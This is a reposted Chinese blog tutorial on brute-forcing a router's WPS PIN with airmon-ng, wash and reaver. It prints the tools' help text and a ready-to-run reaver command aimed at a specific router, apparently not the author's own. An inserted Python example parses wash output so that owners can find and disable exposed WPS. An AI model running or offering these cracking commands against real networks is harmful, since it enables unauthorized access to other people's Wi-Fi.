Put the wireless card into monitor mode

airmon-ng start wlan2
Look for routers that have QSS quick-connect (TP-Link's name for WPS) enabled
root@kali:~# wash --help

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

Required Arguments:
  -i, --interface=<iface>              Interface to capture packets on
  -f, --file [FILE1 FILE2 FILE3 ...]   Read packets from capture files

Optional Arguments:
  -c, --channel=<num>                  Channel to listen on [auto]
  -o, --out-file=<file>                Write data to file
  -n, --probes=<num>                   Maximum number of probes to send to each AP in scan mode [15]
  -D, --daemonize                      Daemonize wash
  -C, --ignore-fcs                     Ignore frame checksum errors
  -5, --5ghz                           Use 5GHz 802.11 channels
  -s, --scan                           Use scan mode
  -u, --survey                         Use survey mode [default]
  -h, --help                           Show help

Example:
  wash -i mon0
Run it with the -C parameter. In the output, BSSID is the AP's MAC address, Channel is the channel, RSSI is the signal strength (the smaller the numeric part, the stronger the signal), WPS Locked shows whether the AP's WPS lock-out mechanism is active, and ESSID is the network name.

wash -i mon0 -C
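The wash table above is easy to read by eye for a handful of networks, but an administrator auditing their own access points usually wants it as data: which APs still advertise WPS, and whether the lock-out is active. The following is an added example for this post, not code from the original article or from the wash/reaver tools. It parses the v1.4 column layout described above (BSSID, Channel, RSSI, WPS Version, WPS Locked, ESSID) and reports APs that advertise WPS without a lock-out, i.e. the ones where WPS should be switched off on the router. The sample output is constructed; only the FAST_D46F76 / 28:2C:B2:D4:6F:76 entry comes from the post.

```python
"""Parse `wash -i mon0 -C` survey output and flag APs that advertise WPS
without a lock-out, so the owner can disable WPS on them.

Added example for this post; not part of the original article or of the
wash/reaver tools. SAMPLE_WASH_OUTPUT is constructed to match the wash v1.4
column layout; only the FAST_D46F76 row is taken from the post.
"""
import re

# Constructed sample: banner, header, separator and three AP rows.
SAMPLE_WASH_OUTPUT = """\
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
28:2C:B2:D4:6F:76       1            -70        1.0               No                FAST_D46F76
00:11:22:33:44:55       6            -45        1.0               Yes               constructed-office
AA:BB:CC:DD:EE:FF      11            -82        2.0               No                constructed-guest
"""

# One AP row: MAC, channel, RSSI in dBm, WPS version, Yes/No lock flag, ESSID.
# Matching on whitespace rather than fixed column offsets keeps this robust to
# the padding wash chooses for each column.
ROW_RE = re.compile(
    r"^(?P<bssid>(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2})\s+"
    r"(?P<channel>\d+)\s+"
    r"(?P<rssi>-?\d+)\s+"
    r"(?P<wps_version>\d+\.\d+)\s+"
    r"(?P<locked>Yes|No)\s+"
    r"(?P<essid>.*?)\s*$"
)


def parse_wash(text):
    """Return one dict per AP row; banner, header and separator lines are skipped."""
    aps = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue
        aps.append({
            "bssid": m["bssid"].upper(),
            "channel": int(m["channel"]),
            "rssi": int(m["rssi"]),          # dBm: -45 is stronger than -70
            "wps_version": m["wps_version"],
            "wps_locked": m["locked"] == "Yes",
            "essid": m["essid"],
        })
    return aps


def wps_exposed(aps):
    """APs that advertise WPS and report no lock-out: disable WPS on these."""
    return [ap for ap in aps if not ap["wps_locked"]]


if __name__ == "__main__":
    for ap in wps_exposed(parse_wash(SAMPLE_WASH_OUTPUT)):
        print(f"{ap['bssid']}  ch {ap['channel']:>2}  {ap['rssi']} dBm  "
              f"{ap['essid']}: WPS enabled and not locked, disable WPS on this AP")
```

Feed it real output with `wash -i mon0 -C > survey.txt` and `parse_wash(open("survey.txt").read())`; every AP that shows up in `wps_exposed` is one whose WPS setting should be turned off in the router's admin page, since the lock-out is the only thing that slows a PIN brute force on an AP that still advertises WPS.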
Pick the FAST_D46F76 router and start the attack
root@kali:~# reaver --help

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

Required Arguments:
  -i, --interface=<wlan>          Name of the monitor-mode interface to use
  -b, --bssid=<mac>               BSSID of the target AP

Optional Arguments:
  -m, --mac=<mac>                 MAC of the host system
  -e, --essid=<ssid>              ESSID of the target AP
  -c, --channel=<channel>         Set the 802.11 channel for the interface (implies -f)
  -o, --out-file=<file>           Send output to a log file [stdout]
  -s, --session=<file>            Restore a previous session file
  -C, --exec=<command>            Execute the supplied command upon successful pin recovery
  -D, --daemonize                 Daemonize reaver
  -a, --auto                      Auto detect the best advanced options for the target AP
  -f, --fixed                     Disable channel hopping
  -5, --5ghz                      Use 5GHz 802.11 channels
  -v, --verbose                   Display non-critical warnings (-vv for more)
  -q, --quiet                     Only display critical messages
  -h, --help                      Show help

Advanced Options:
  -p, --pin=<wps pin>             Use the specified 4 or 8 digit WPS pin
  -d, --delay=<seconds>           Set the delay between pin attempts [1]
  -l, --lock-delay=<seconds>      Set the time to wait if the AP locks WPS pin attempts [60]
  -g, --max-attempts=<num>        Quit after num pin attempts
  -x, --fail-wait=<seconds>       Set the time to sleep after 10 unexpected failures [0]
  -r, --recurring-delay=<x:y>     Sleep for y seconds every x pin attempts
  -t, --timeout=<seconds>         Set the receive timeout period [5]
  -T, --m57-timeout=<seconds>     Set the M5/M7 timeout period [0.20]
  -A, --no-associate              Do not associate with the AP (association must be done by another application)
  -N, --no-nacks                  Do not send NACK messages when out of order packets are received
  -S, --dh-small                  Use small DH keys to improve crack speed
  -L, --ignore-locks              Ignore locked state reported by the target AP
  -E, --eap-terminate             Terminate each WPS session with an EAP FAIL packet
  -n, --nack                      Target AP always sends a NACK [Auto]
  -w, --win7                      Mimic a Windows 7 registrar [False]

Example:
  reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv
Use the following parameters

reaver -i mon0 -b 28:2C:B2:D4:6F:76 -a -S -d 3 -t 3 -vv -c 1
-i   the wireless card's monitor-mode interface
-b   MAC address of the target AP
-a   auto-detect the best settings for the target AP
-S   use small DH keys, which speeds up cracking
-d   delay between PIN attempts; the default is 1 second
-t   timeout, the maximum time to wait for a reply on each attempt
-vv  show more non-critical warnings
-c   pin the channel, which makes the signal easier to find
Off to dinner; hoping it will have cracked it by the time I get back :)
This article is reposted from Wen Donghui's 51CTO blog; original link: http://blog.51cto.com/hackerwang/1420938. Contact the original author for reprint permission.
谢文东666